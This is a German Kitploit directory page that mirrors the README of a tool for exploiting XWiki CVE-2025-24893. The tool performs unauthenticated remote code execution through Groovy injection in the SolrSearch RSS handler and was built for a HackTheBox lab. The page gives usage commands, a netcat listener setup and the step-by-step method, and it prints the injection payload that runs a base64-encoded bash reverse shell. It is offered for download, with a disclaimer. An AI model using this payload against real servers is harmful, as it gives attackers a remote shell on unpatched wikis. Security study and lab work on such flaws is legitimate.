Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
xwiki-cve-2025-24893-exploit — Unauthentifizierter RCE-Exploit für XWiki CVE-2025-24893 per Groovy-Skript-Injektion | Kitploit
Tools/GitHubGitHub/tomkingori/xwiki-cve-2025-24893-exploit
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubtomkingori/xwiki-cve-2025-24893-exploit

xwiki-cve-2025-24893-exploit

Unauthentifizierter RCE-Exploit für XWiki CVE-2025-24893 per Groovy-Skript-Injektion

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
vor 8 MonatenNoch nicht geprüft
Teilen

XWiki CVE-2025-24893 Exploit

Exploit für nicht authentifizierte Remote-Code-Ausführung für XWiki-Versionen, die für CVE-2025-24893 anfällig sind.

Überblick über die Schwachstelle

XWiki-Versionen vor 15.10.9 sind anfällig für nicht authentifizierte RCE durch Groovy-Skriptinjektion im SolrSearch-RSS-Feed-Handler. Die Schwachstelle besteht, weil XWiki Benutzereingaben im Parameter text nicht ordnungsgemäß bereinigt, wodurch Angreifer den RSS-Kontext verlassen und beliebigen Groovy-Code injizieren können.

CVE-ID: CVE-2025-24893
CVSS-Score: 9.8 (Kritisch)
Betroffene Versionen: XWiki < 15.10.9

Features

  • Einfache Kommandozeilenschnittstelle
  • Automatische Payload-Generierung und -Kodierung
  • Base64-kodierte Reverse Shell zur Umgehung einfacher Filter
  • Minimale Abhängigkeiten (nur requests-Bibliothek)

Voraussetzungen

root@kitploit:~
pip3 install requests

Verwendung

root@kitploit:~
python3 exploit.py <target_url> <attacker_ip> <listener_port>

Beispiel:

root@kitploit:~
# Listener auf dem Angreifer-Rechner starten
nc -lvnp 9001

# Exploit ausführen
python3 exploit.py http://10.10.11.80:8080 10.10.14.5 9001

Funktionsweise

  1. Erstellt einen Bash-Reverse-Shell-Befehl
  2. Kodiert den Payload mit Base64
  3. Verpackt ihn mithilfe von Template-Injection in Groovy-Code (}}}}}}{{{{groovy}}}})
  4. URL-kodiert den Payload, während notwendige Trennzeichen erhalten bleiben
  5. Sendet eine GET-Anfrage an /xwiki/bin/get/Main/SolrSearch?media=rss&text=<payload>
  6. XWiki verarbeitet den schädlichen RSS-Feed und führt den Groovy-Code aus

Proof of Concept

Der Exploit zielt auf den folgenden Endpunkt:

root@kitploit:~
/xwiki/bin/get/Main/SolrSearch?media=rss&text=

Die Schwachstelle ermöglicht das Verlassen des RSS-Feed-Kontexts:

root@kitploit:~
}}}}}}{{{{async async=false}}}}{{{{groovy}}}}
"bash -c {echo,<base64_payload>}|{base64,-d}|{bash,-i}".execute()
{{{{/groovy}}}}{{{{/async}}}}

Haftungsausschluss

Dieses Tool dient ausschließlich zu Bildungszwecken und für autorisierte Penetrationstests. Der Autor ist nicht für Missbrauch oder Schäden verantwortlich, die durch dieses Programm verursacht werden. Verwenden Sie diesen Exploit nur gegen Systeme, die Ihnen gehören oder für die Sie eine ausdrückliche Genehmigung zum Testen haben.

Referenzen

  • XWiki-Sicherheitshinweis
  • CVE-2025-24893

Lizenz

MIT-Lizenz – Einzelheiten finden Sie in der Datei LICENSE

Autor

Erstellt für die HTB-Box „Editor“


Hinweis: Vergewissern Sie sich immer, dass Sie ordnungsgemäß autorisiert sind, bevor Sie Systeme testen.

Tool herunterladen